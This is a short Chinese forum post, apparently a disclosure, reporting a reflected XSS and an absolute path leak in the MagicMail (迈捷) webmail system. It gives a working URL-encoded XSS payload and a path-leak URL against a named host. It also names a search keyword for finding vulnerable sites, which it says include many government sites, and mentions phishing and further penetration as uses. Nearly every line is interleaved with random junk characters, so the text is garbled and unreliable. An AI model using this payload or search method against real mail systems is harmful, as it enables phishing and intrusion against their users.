今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞- `, K6 c. Y; @+ @) K
2 L4 C& `9 x- I/ | ) |" \+ G; c- a
包含 一个反射性XSS 以及 绝对路径泄漏
* u! o3 H. N' Y0 a: \ a6 J看了看 貌似全部是linux的。8 b; y% B3 J* I# B8 I9 ^
0 j" M5 l& p; x4 j" J3 {0 z. F
关键字:迈捷邮件系统 by MagicMail1 O5 h. A8 k; G& |6 H
/ r/ q ~' O( `1 C2 Z$ ?可以看到很多政府网站都用这个邮件系统* }8 `" N" s1 N4 N
9 ]/ k$ @* |8 L
绝对路径 http://madman.in/index.php?login_type=declare&language=: M3 i: k: B$ [8 Y7 Y
. s" V& d5 `: S# W* E) e
- u( p' r4 |4 p* _; W
/ n2 N. ^5 b. r# ?6 XXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
d" j2 H2 R9 r0 r* y" t
* @: h: [# X) c. Y/ U3 R/ X% d# j7 b: i$ |% \/ R3 G
8 t* }& Q/ \" t! Y
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等2 j# h( j9 B6 ^( e. |9 e
; d4 W& v: z) P+ r# `
修复方案:看官方补丁吧。7 u( r6 k. F( |9 W0 J4 v/ A5 M& x
|